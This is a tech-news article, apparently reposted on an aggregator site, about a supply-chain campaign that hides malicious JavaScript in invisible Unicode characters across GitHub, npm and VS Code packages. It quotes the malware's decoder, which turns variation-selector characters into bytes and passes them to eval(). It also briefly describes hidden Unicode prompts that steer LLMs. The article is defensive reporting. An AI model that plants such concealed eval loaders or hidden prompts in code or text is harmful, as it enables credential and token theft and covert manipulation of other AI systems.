Close Menu

    Subscribe to Updates

    Get the latest news from tastytech.

    What's Hot

    US embassy in Venezuela reopens as Trump pushes for access to resources | Donald Trump News

    March 14, 2026

    15 Steps to Ensure Your Company’s Compliance

    March 14, 2026

    UniFi Cloud Gateways (Routers): 2026’s Comprehensive Buying Guide

    March 14, 2026
    Facebook X (Twitter) Instagram
    Facebook X (Twitter) Instagram
    tastytech.intastytech.in
    Subscribe
    • AI News & Trends
    • Tech News
    • AI Tools
    • Business & Startups
    • Guides & Tutorials
    • Tech Reviews
    • Automobiles
    • Gaming
    • movies
    tastytech.intastytech.in
    Home»Tech Reviews»Supply-chain attack using invisible code hits GitHub and other repositories
    Supply-chain attack using invisible code hits GitHub and other repositories
    Tech Reviews

    Supply-chain attack using invisible code hits GitHub and other repositories

    gvfx00@gmail.comBy gvfx00@gmail.comMarch 14, 2026No Comments3 Mins Read
    Share
    Facebook Twitter LinkedIn Pinterest Email



    The invisible code is rendered with Public Use Areas (sometimes called Public Use Access), which are ranges in the Unicode specification for special characters reserved for private use in defining emojis, flags, and other symbols. The code points represent every letter of the US alphabet when fed to computers, but their output is completely invisible to humans. People reviewing code or using static analysis tools see only whitespace or blank lines. To a JavaScript interpreter, the code points translate into executable code.

    The invisible Unicode characters were devised decades ago and then largely forgotten. That is, until 2024, when hackers began using the characters to conceal malicious prompts fed to AI engines. While the text was invisible to humans and text scanners, LLMs had little trouble reading them and following the malicious instructions they conveyed. AI engines have since devised guardrails that are designed to restrict usage of the characters, but such defenses are periodically overridden.

    Since then, the Unicode technique has been used in more traditional malware attacks. In one of the packages Aikido analyzed in Friday’s post, the attackers encoded a malicious payload using the invisible characters. Inspection of the code shows nothing. During the JavaScript runtime, however, a small decoder extracts the real bytes and passes them to the eval() function.

    const s = v => [...v].map(w => (
      w = w.codePointAt(0),
      w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
      w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
    )).filter(n => n !== null);
    
    
    eval(Buffer.from(s(``)).toString('utf-8'));

    “The backtick string passed to s() looks empty in every viewer, but it’s packed with invisible characters that, once decoded, produce a full malicious payload,” Aikido explained. “In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.”

    Since finding the new round of packages on GitHub, the researchers have found similar ones on npm and the VS Code marketplace. Aikido said the 151 packages detected are likely a small fraction spread across the campaign because many have been deleted since first being uploaded.

    The best way to protect against the scourge of supply-chain attacks is to carefully inspect packages and their dependencies before incorporating them into projects. This includes scrutinizing package names and searching for typos. If suspicions about LLM use are correct, malicious packages may increasingly appear to be legitimate, particularly when invisible unicode characters are encoding malicious payloads.

    Table of Contents

    Toggle
      • Related posts:
    • DOJ and states appeal Google monopoly ruling to push for harsher penalties against the company
    • Hallmark's 2025 'Countdown to Christmas': Every New Upcoming Movie and Show
    • RedMagic's Thinner Gaming Phone Gets a 7,000-mAh Battery and a Cooling Fan

    Related posts:

    Sabalenka vs Rybakina Free Streams: How to Watch Australian Open 2026 women's final

    Today's NYT Connections: Sports Edition Hints, Answers for Jan. 20 #484

    How to cancel Private Internet Access and get a refund

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleArc Raiders Replacing AI-Generated Voices With Human Actors
    Next Article Postgres vs MySQL vs SQLite: Comparing SQL Performance Across Engines
    gvfx00@gmail.com
    • Website

    Related Posts

    Tech Reviews

    UniFi Cloud Gateways (Routers): 2026’s Comprehensive Buying Guide

    March 14, 2026
    Tech Reviews

    OpenAI reportedly plans to add Sora video generation to ChatGPT

    March 14, 2026
    Tech Reviews

    Two Lost ‘Doctor Who’ Episodes Found Intact in Waterlogged Collection

    March 14, 2026
    Add A Comment
    Leave A Reply Cancel Reply

    Top Posts

    BMW Will Put eFuel In Cars Made In Germany From 2028

    October 14, 202511 Views

    Best Sonic Lego Deals – Dr. Eggman’s Drillster Gets Big Price Cut

    December 16, 20259 Views

    What is Fine-Tuning? Your Ultimate Guide to Tailoring AI Models in 2025

    October 14, 20259 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram

    Subscribe to Updates

    Get the latest tech news from tastytech.

    About Us
    About Us

    TastyTech.in brings you the latest AI, tech news, cybersecurity tips, and gadget insights all in one place. Stay informed, stay secure, and stay ahead with us!

    Most Popular

    BMW Will Put eFuel In Cars Made In Germany From 2028

    October 14, 202511 Views

    Best Sonic Lego Deals – Dr. Eggman’s Drillster Gets Big Price Cut

    December 16, 20259 Views

    What is Fine-Tuning? Your Ultimate Guide to Tailoring AI Models in 2025

    October 14, 20259 Views

    Subscribe to Updates

    Get the latest news from tastytech.

    Facebook X (Twitter) Instagram Pinterest
    • Homepage
    • About Us
    • Contact Us
    • Privacy Policy
    © 2026 TastyTech. Designed by TastyTech.

    Type above and press Enter to search. Press Esc to cancel.

    Ad Blocker Enabled!
    Ad Blocker Enabled!
    Our website is made possible by displaying online advertisements to our visitors. Please support us by disabling your Ad Blocker.